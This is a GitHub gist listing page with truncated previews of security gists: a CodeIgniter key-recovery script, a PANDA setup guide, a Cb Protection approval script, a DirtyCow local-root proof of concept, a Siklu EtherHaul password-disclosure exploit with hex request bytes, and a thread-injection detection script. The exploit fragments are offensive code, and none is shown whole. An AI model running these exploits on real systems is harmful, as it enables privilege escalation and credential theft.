Skip to content

Instantly share code, notes, and snippets.

View phreakinggeek's full-sized avatar

phreakinggeek

26 followers · 41 following
View GitHub Profile
@kivikakk
kivikakk / ci-key-recover.py
Last active February 7, 2020 13:58
recover key from CodeIgniter homegrown crypto
#!/usr/bin/env python3
# CodeIgniter pre-2.2 non-mcrypt Encrypt reverser.
# Finds the key by partially-known plaintext attack.
# Written by Ashe Connor. Placed in the public domain.
import codecs
import re
import sys
import time
@bridgeythegeek
bridgeythegeek / MyFirstPANDA.md
Last active August 15, 2023 10:48
My First PANDA

My First PANDA

Introduction

Being someone who tries to play a lot with Windows memory, I really wanted to play with PANDA, but I was slightly scared because I'd never touched qemu before - all my experience had been with VirtualBox and VMware.

My goal was to install PANDA into a (relatively) clean install of Debian 8 'Jessie', capture a recording and successfully run a PANDA plugin.

1. Get PANDA

@jgarman
jgarman / local_approval.py
Created June 29, 2016 18:34
A small script using the Cb Protection API to mark a specific MD5 as locally approved on a given computer
from cbapi.protection import CbEnterpriseProtectionAPI, FileCatalog, Computer, FileInstance
from cbapi.errors import ObjectNotFoundError
import sys
import time
# set up DEBUG logging
import logging
root = logging.getLogger()
root.addHandler(logging.StreamHandler())
@rverton
rverton / cowroot.c
Created October 21, 2016 14:06
CVE-2016-5195 (DirtyCow) Local Root PoC
/*
* (un)comment correct payload first (x86 or x64)!
*
* $ gcc cowroot.c -o cowroot -pthread
* $ ./cowroot
* DirtyCow root privilege escalation
* Backing up /usr/bin/passwd.. to /tmp/bak
* Size of binary: 57048
* Racing, this may take a while..
* /usr/bin/passwd overwritten
@ianling
ianling / siklu_etherhaul_showpw.py
Last active November 15, 2019 15:51
Siklu EtherHaul Show Password Exploit
import socket
from time import sleep
address = '192.168.1.11' # the target
port = 555
# set up binary strings to send to the radio
root = bytearray(b'\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\xad\x00\x00\x00\x00\x72\x6f\x6f\x74\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00')
moinfo = bytearray(b'\x6d\x6f\x2d\x69\x6e\x66\x6f\x20\x73\x79\x73\x74\x65\x6d\x20\x3b\x20\x6e\x74\x70\x20\x3b\x20\x69\x70\x20\x3b\x20\x69\x70\x76\x36\x20\x3b\x20\x65\x74\x68\x20\x3b\x20\x61\x61\x61\x2d\x73\x65\x72\x76\x65\x72\x20\x3b\x20\x61\x61\x61\x20\x3b\x20\x73\x6e\x6d\x70\x2d\x6d\x6e\x6
@jaredcatkinson
jaredcatkinson / Get-InjectedThread.ps1
Last active April 22, 2024 19:09
Code from "Taking Hunting to the Next Level: Hunting in Memory" presentation at SANS Threat Hunting Summit 2017 by Jared Atkinson and Joe Desimone
function Get-InjectedThread
{
<#
.SYNOPSIS
Looks for threads that were created as a result of code injection.
.DESCRIPTION